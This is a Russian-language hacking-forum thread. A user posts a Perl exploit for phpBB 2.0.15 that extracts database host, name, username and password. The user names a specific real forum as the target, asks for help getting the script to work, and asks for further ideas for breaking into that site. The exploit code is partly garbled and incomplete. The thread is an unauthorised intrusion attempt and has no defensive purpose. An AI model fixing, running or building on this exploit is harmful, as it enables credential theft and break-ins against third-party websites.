Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Эксплойт на phpBB 2.0.x (https://forum.antichat.xyz/showthread.php?t=262208)

Darvin 02.03.2011 02:52

Всем привет, возникла проблемка с таким эксплойтом:

(Суть его получить адрес, название, логин и пароль к базе)

Код:

Code:
#!/usr/bin/perl

# tested and working /str0ke

#        ********************************************************************
#      **********************************************************************
#      ****                                                                **
#    ***      ******      *******************                            **
#    ***    ***  ****  ***********************                            **
#  ***  ***    ****                      ****      *  ***    *****    **
#  ***  ***      ***                ***    ***      *  **  **  **        **
# ***  ***                        ***      **        **  **  **        **
#***  ***                          ***    ***          **  **  *****      **
#**  ***                          ***  ****          **  **      **      **
#**  ***      ***  ***  ******* *******            **  ***      **      **
#**  ***      ***  ***  **      *** ***              **  **  **  **      **
#**  ***      ***  ***  **      ***  ***              ***  *****        **
#**  ***    ***  *** **      ***  ***                                  **
#**  ****  ***    ****        ***  ***                                  **
#**    *******    ****  ********    ***********************************  **
#**        ***                                                            **
#**        ***                                                              **
#**                                                                        **
#**      phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability    **
#**      This exploit gives the user all the details about the database    **
#**      connection such as database host, username, password and          **
#**      database name.                                                    **
#**                                                                        **
#**              Written by SecureD,  gvr.securedgmailcom,2005    **
#**                                                                        **
#**      Greetings to GvR, Jumento, PP, CKrew & friends                      **
#**                                                                        **
#*****************************************************************************
# ***************************************************************************

use IO::Socket;

print "+-----------------------------------------------------------------------+\r\n";
print "|          PhpBB 2.0.15 Database Authentication Details Exploit        |\r\n";
print "|                By SecureD gvr.securedgmailcom              |\r\n";
print "+-----------------------------------------------------------------------+\r\n";

if (@ARGV new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[+] Connecting ... Could not connect to host.\n\n";

print "[+] Connecting      OK\n";
sleep(1);

print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\r\n";
print $sock "Host: $serv\r\n";
if ( defined $cookie) {
    print $sock "Cookie: $cookie \r\n";
}
print $sock "Connection: close\r\n\r\n";

$succes = 0;

while ($answer = ) {
    $delimitIndex = index $answer, $delimit;
    if ($delimitIndex >= 0) {
        $succes = 1;
        $urlIndex = index $answer, "href";
        if ($urlIndex  0) {
                $nex = index($answer, $delimit);
                if ($nex > 0) {
                    push(@array, substr($answer, 0, $nex));
                    $answer = substr($answer, $nex + length($delimit), length($answer));
                } else {
                    $answer= "";
                }
            }
        }
    }
}

close($sock);

if ($succes == 1) {
    print "OK\n";
    sleep(1);
    print "[+] Database Host:  " . $array[0] . "\n";
    sleep(1);
    print "[+] Database Name:  " . $array[1] . "\n";
    sleep(1);
    print "[+] Username:      " . $array[2] . "\n";
    sleep(1);
    print "[+] Password:      " . $array[3] . "\n";
    sleep(1);
} else {
    print "FAILED\n";
}

# milw0rm.com [2005-07-03]

Жертва - http://www.movingscam.com/forum/

Версия форума выше 2.0.11 (changelog.html) и ниже 2.0.20 (так как поиск не блокируется по времени).

Сначала неправильно прописал стринг куки:

http://pic4.org/storage/52b458716996...5b3ee369cb.PNG

Отсюда заметил, что перед тем как перейти на форум, оно требует еще подтверждения, что собственно и хранится в куке под переменной tosid.

После поправил строку от пробелов и вроде кука подошла, скрипт сказал "работаю", но ничё не вывел.

http://pic4.org/storage/639481dc7627...b8a6a27328.PNG

Дальше разобраться в чём дело не смог в силу скромных познаний в Perl (сроком 1 вечер xD). Посему прошу помощь опытных гуру растолковать, если смогут что и как. Или дать еще какие-то советы по поводу взлома данного форума.

XSS как я понял отпадает, так как админ там судя по всему раз в год появляется. Префиксы базы походу изменены (не стандартные), так как предложенными способами тут на форуме я их не выяснил (возможно неправильно понял принцип работы самих способов), да и переменные сессии в куке тоже, как видим, изменены.

Что кто скажет?


Время: 02:37